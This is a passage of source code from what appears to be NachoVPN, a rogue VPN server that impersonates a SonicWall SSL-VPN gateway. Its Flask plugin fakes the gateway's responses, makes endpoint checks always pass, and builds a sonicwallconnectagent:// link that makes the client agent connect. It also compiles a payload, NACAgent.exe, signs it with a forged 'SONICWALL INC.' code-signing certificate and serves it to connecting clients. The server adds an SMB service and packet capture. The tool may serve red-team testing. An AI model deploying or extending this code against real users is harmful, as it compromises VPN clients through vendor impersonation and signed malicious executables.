            if request.args.get('getepcprofiles'):
                return 'X-NE-sslvpnnac-allow: {}\r\nX-NE-sslvpnnac-deny: {}'
            elif request.args.get('launchnetextender'):
                return self.render_template('launchextender.html')
            elif request.args.get('versionquery'):
                return 'NX_WINDOWS_VER: 0x00000000;\n NX_TUNNEL_PROTO_VER: 2.0;\n NX_MAY_CHANGE_PASSWORD:0;\n NX_WIN_MIN_GOOD_VERSION: 0x0a020153;\n'
            elif request.args.get('launchplatform'):
                return self.render_template('launchplatform.html')
            elif request.args.get('epcversionquery'):
                return 'NX_WINDOWS_EPC_VER: 0xFF;'
            elif request.args.get('gettunnelfailedinfo'):
                return '' \
                       ''
            elif request.args.get('launchextrainfos'):
                return 'connProxy = 0;\nconnPacURL = ;\nconnProxyURL = ;\nconnProxyByPass = ;\n'
            elif request.form.get('setclienthostname'):
                return ''
            return abort(404)

        @self.flask_app.route('/cgi-bin/sessionStatus')
        def session_status():
            # keep-alive: tell the client it never needs to touch the session again
            if request.form.get('touchSession'):
                return {"status":"touch ok", "nxnoneedtouchsession": "true"}
            return abort(404)

        @self.flask_app.route('/cgi-bin/getaovconf', methods = ['POST', 'GET'])
        def getaovconf():
            # Always-On-VPN configuration: everything disabled, public DNS servers
            return { "result": 0,"aovTempShutDown": 0, "aovAllowAlwaysOnVPN": 0, "aovAllowUserDisconnect": 0, "aovUserEmail": "", "aovAllowAccessWhenVPNFailToConnect": 0, "aovAllowNoConnectInTrustedNetwork": 0, "aovSecureHosts": "", "nePrimaryDns": "1.1.1.1", "neSecondaryDns": "8.8.8.8", "dnsDomainSuffixes": "" }

        @self.flask_app.route('/cgi-bin/tunneltype', methods = ['POST', 'GET'])
        def tunnel_type():
            return {"preferVPN": "SSLVPN","allowedVPN": "NONE"}

        @self.flask_app.route('/cgi-bin/epcs', methods = ['POST', 'GET'])
        def epcs():
            # end-point-control check always passes
            return 'X-NE-epcret: pass'

        @self.flask_app.route('/cgi-bin/wxacneg')
        def wxacneg():
            return self.render_template('wxacneg.html')

        @self.flask_app.route('/cgi-bin/userLogout')
        def logout():
            return self.render_template('logout.html')

        @self.flask_app.route('/NXSetupU.exe')
        def nxsetup():
            if not os.path.exists(os.path.join(self.payload_dir, 'NXSetupU.exe')):
                return abort(404)
            return send_file(os.path.join(self.payload_dir, 'NXSetupU.exe'))

        @self.flask_app.route('/NACAgent.exe')
        def nacagent():
            # serve the compiled + signed payload produced by setup_payload()
            if not os.path.exists(os.path.join(self.payload_dir, 'NACAgent.exe')):
                return abort(404)
            return send_file(os.path.join(self.payload_dir, 'NACAgent.exe'))

        @self.flask_app.route('/NXSetupU.exe.manifest')
        def nxsetup_manifest():
            if not os.path.exists(os.path.join(self.payload_dir, 'NXSetupU.exe.manifest')):
                return abort(404)
            return send_file(os.path.join(self.payload_dir, 'NXSetupU.exe.manifest'))

        @self.flask_app.route('/cgi-bin/extendauthentication', methods = ['POST', 'GET'])
        def extendauthentication():
            resp = make_response('{"response":"OK"}')
            resp.set_cookie('swap', self.random_swap())
            return resp

        @self.flask_app.route('/sonicwall')
        def index():
            # the sonicwallconnectagent:// URI handler must use the external IP address and NOT the DNS name
            token = { "action": 10, "helperversion": "1.1.42", "host": self.external_ip, "port": "443", "username": "user", "extendid": base64.b64encode(os.urandom(32)).decode() }
            # strip spaces so the base64 blob matches what the agent expects
            data = json.dumps(token).replace(' ', '')
            encoded = urllib.parse.quote(base64.b64encode(str(data).encode()).decode())
            url = f"sonicwallconnectagent://{encoded}"
            # NOTE(review): template body appears stripped in this dump; original
            # presumably embedded {url} in the returned HTML — confirm upstream.
            return f""

    def compile_payload(self):
        """Cross-compile files/NACAgent.c to payloads/NACAgent.exe with mingw-w64.

        Returns True on success, False if the source or compiler is missing
        or compilation fails.
        """
        source_file = os.path.join(self.files_dir, 'NACAgent.c')
        output_file = os.path.join(self.payload_dir, 'NACAgent.exe')
        if not os.path.exists(source_file) or not os.path.exists('/usr/bin/x86_64-w64-mingw32-gcc'):
            return False
        proc = subprocess.run([
            "/usr/bin/x86_64-w64-mingw32-gcc",
            "-L", "/usr/x86_64-w64-mingw32/lib",
            "-o", output_file, source_file,
            "--static", "-lwtsapi32", "-luserenv"
        ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return proc.returncode == 0 and os.path.exists(output_file)

    def verify_payload(self):
        """Check that payloads/NACAgent.exe is signed by our current CA.

        Returns True when verification passes or cannot be performed
        (Windows host, or osslsigncode not installed); False on failure.
        """
        # Verify that the payload is signed by our current CA
        if os.name == "nt":
            self.logger.error("Windows payload verification not supported yet")
            return True
        if os.name == "posix" and not os.path.exists('/usr/bin/osslsigncode'):
            self.logger.error("osslsigncode not found, skipping verification")
            return True
        proc = subprocess.run([
            "/usr/bin/osslsigncode", "verify",
            "-CAfile", self.cert_manager.ca_cert_path,
            "-in", os.path.join(self.payload_dir, 'NACAgent.exe'),
        ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        if proc.returncode:
            self.logger.error(f"Failed to verify {os.path.join(self.payload_dir, 'NACAgent.exe')}: {proc.returncode}")
            return False
        self.logger.info(f"{os.path.join(self.payload_dir, 'NACAgent.exe')} verified")
        return True

    def setup_payload(self):
        """Ensure a signed NACAgent.exe exists: compile if needed, then sign it.

        Returns True when a validly signed payload is in place, False when it
        could not be compiled or signed (the payload will not be served).
        """
        # skip on Windows for now (we can use signtool if needed)
        if os.name == 'nt':
            return True
        # If the payload already exists and is validly signed, skip compilation/signing
        if os.path.exists(os.path.join(self.payload_dir, 'NACAgent.exe')) and \
           self.verify_payload():
            self.logger.info(f"{os.path.join(self.payload_dir, 'NACAgent.exe')} already exists and is validly signed")
            return True
        # the user can provide their own sonicwall.pfx file in the certs directory
        # if not, a new signing certificate will be generated and self-signed by the CA
        cert_path = os.path.join('certs', 'sonicwall.cer')
        key_path = os.path.join('certs', 'sonicwall.key')
        pfx_path = os.path.join('certs', 'sonicwall.pfx')
        if not os.path.exists(pfx_path) or not self.cert_manager.cert_is_valid(cert_path, "SONICWALL INC."):
            pfx_path = self.cert_manager.generate_codesign_certificate(
                common_name="SONICWALL INC.",
                pfx_path=pfx_path,
                cert_path=cert_path,
                key_path=key_path
            )
        # sign NACAgent.exe
        input_file = os.path.join(self.payload_dir, 'NACAgent.exe')
        output_file = os.path.join(self.payload_dir, 'NACAgent.exe.signed')
        if not os.path.exists(input_file):
            # attempt to compile the default payload from source
            if not self.compile_payload():
                self.logger.warning(f"Warning: {input_file} does not exist and could not be compiled. Payload will not be served.")
                return False
        proc = subprocess.run(["/usr/bin/osslsigncode", 'sign', '-pkcs12', pfx_path,
                               '-in', input_file, '-out', output_file],
                              stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        if proc.returncode or not os.path.exists(output_file):
            self.logger.warning(f"Warning: {input_file} could not be signed. Payload will not be served.")
            return False
        else:
            # replace the unsigned binary with the signed one
            shutil.move(output_file, input_file)
        return True
================================================ FILE: src/nachovpn/plugins/sonicwall/templates/launchextender.html ================================================ Virtual Office
 
 

You may also manually download NetExtender and run it.
You may be required to login again after launching.


To get NetExtender for another platform go to the All Downloads page.

NetExtender ActiveX Installer Instructions
  Step 1 - A yellow information bar may appear at the top of the browser.
  Step 2 - If it does, please click on the yellow bar and choose Install ActiveX Control...
  Step 3 - If a Security Warning window appears,
Click Install to proceed.
================================================ FILE: src/nachovpn/plugins/sonicwall/templates/launchplatform.html ================================================ Virtual Office SessionId = py0nwVXgydGW17JQXQRq6nYdObmqUQyrzEUTbK8os8I= Route = 192.168.200.0/255.255.255.0 ipv6Support = no Compression = yes dns1 = 1.1.1.1 dns2 = 8.8.8.8 pppFrameEncoded = 0 PppPref = async displayName = user NX_TUNNEL_PROTO_VER = 2.0 TunnelAllMode = 0 UninstallAfterExit = 0; ExitAfterDisconnect = 0; NoProfileCreate = 0; AllowSavePassword = 0; AllowSaveUser = 1; AllowSavePasswordInKeychain = 0; AllowSavePasswordInKeystore = 0; AllowSavePasswordInKeychainMac = 0; AllowSavePasswordInKeychainFaceIDiOS = 0; AllowDisableUpdate = 0; ================================================ FILE: src/nachovpn/plugins/sonicwall/templates/logout.html ================================================ Virtual Office ================================================ FILE: src/nachovpn/plugins/sonicwall/templates/welcome.html ================================================ Virtual Office


Processing... Processing...
================================================ FILE: src/nachovpn/plugins/sonicwall/templates/wxacneg.html ================================================ Page Not Found

Error: The page you are trying to access is not available. Click here to go back.
================================================ FILE: src/nachovpn/server.py ================================================ from nachovpn.core.request_handler import VPNStreamRequestHandler from nachovpn.core.plugin_manager import PluginManager from nachovpn.core.cert_manager import CertManager from nachovpn.core.db_manager import DBManager from nachovpn.plugins import VPNPlugin from nachovpn.core.packet_handler import PacketHandler from nachovpn.core.smb_manager import SMBManager import nachovpn.plugins import logging import inspect import socket import socketserver import os import sys import threading import asyncio import argparse logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s - [%(module)s.%(funcName)s]' ) class ThreadedVPNServer(socketserver.ThreadingTCPServer): def __init__(self, server_address, RequestHandlerClass, cert_manager, plugin_manager, use_tls=True): self.cert_manager = cert_manager self.plugin_manager = plugin_manager super().__init__(server_address, RequestHandlerClass) if use_tls: self.socket = cert_manager.ssl_context.wrap_socket(self.socket, server_side=True) class VPNServer: def __init__(self, host='0.0.0.0', port=443, tls=True, cert_dir=os.path.join(os.getcwd(), 'certs')): self.host = host self.port = port self.tls = tls # Setup certificates self.cert_manager = CertManager(cert_dir) self.cert_manager.setup() # Initialize database self.db_manager = DBManager() # Start SMB server self.smb_manager = SMBManager() # Setup plugin manager with cert hash self.plugin_manager = PluginManager() # Common plugin kwargs plugin_kwargs = { 'write_pcap': os.getenv("WRITE_PCAP", False), 'cert_manager': self.cert_manager, 'external_ip': os.getenv('EXTERNAL_IP', socket.gethostbyname(socket.gethostname())), 'dns_name': os.getenv('SERVER_FQDN') or os.getenv('WEBSITE_HOSTNAME', socket.gethostname()), 'db_manager': self.db_manager, } # Create PacketHandler self.packet_handler = 
PacketHandler(write_pcap=plugin_kwargs['write_pcap']) plugin_kwargs['packet_handler'] = self.packet_handler self.plugin_manager.packet_handler = self.packet_handler # Register plugins for name, plugin in inspect.getmembers(nachovpn.plugins, inspect.isclass): if issubclass(plugin, VPNPlugin) and plugin != VPNPlugin: self.plugin_manager.register_plugin(plugin, **plugin_kwargs) # Allow reuse of the address socketserver.ThreadingTCPServer.allow_reuse_address = True # Set packet handler self._packet_handler_thread = None self._packet_handler_loop = None def _start_packet_handler(self): def run(): loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) self._packet_handler_loop = loop loop.run_until_complete(self.packet_handler.start()) loop.run_forever() self._packet_handler_thread = threading.Thread(target=run, daemon=True) self._packet_handler_thread.start() def _stop_packet_handler(self): if self._packet_handler_loop: self._packet_handler_loop.call_soon_threadsafe(self._packet_handler_loop.stop) if self._packet_handler_thread: self._packet_handler_thread.join(timeout=5) def run(self): # Start PacketHandler self._start_packet_handler() try: with ThreadedVPNServer( (self.host, self.port), VPNStreamRequestHandler, self.cert_manager, self.plugin_manager, self.tls ) as server: logging.info(f"Server listening on {self.host}:{self.port}") server.serve_forever() finally: self._stop_packet_handler() def main(): parser = argparse.ArgumentParser(description='NachoVPN Server') parser.add_argument('--port', type=int, default=443, help='Port to listen on (default: 443)') parser.add_argument('--no-tls', dest='tls', action='store_false', help='Disable TLS encryption (default: enabled)') parser.add_argument('--host', default='0.0.0.0', help='Host to bind to (default: 0.0.0.0)') parser.add_argument('--cert-dir', default=os.path.join(os.getcwd(), 'certs'), help='Certificate directory (default: ./certs)') parser.add_argument('-d', '--debug', action='store_true', help='Enable debug 
logging') parser.add_argument('-q', '--quiet', action='store_true', help='Enable quiet logging (warnings only)') args = parser.parse_args() # Set log level log_level = logging.INFO if args.debug: log_level = logging.DEBUG elif args.quiet: log_level = logging.WARNING logging.getLogger().setLevel(log_level) server = VPNServer(host=args.host, port=args.port, tls=args.tls, cert_dir=args.cert_dir) try: server.run() except KeyboardInterrupt: logging.info("\nShutting down...") if __name__ == '__main__': main()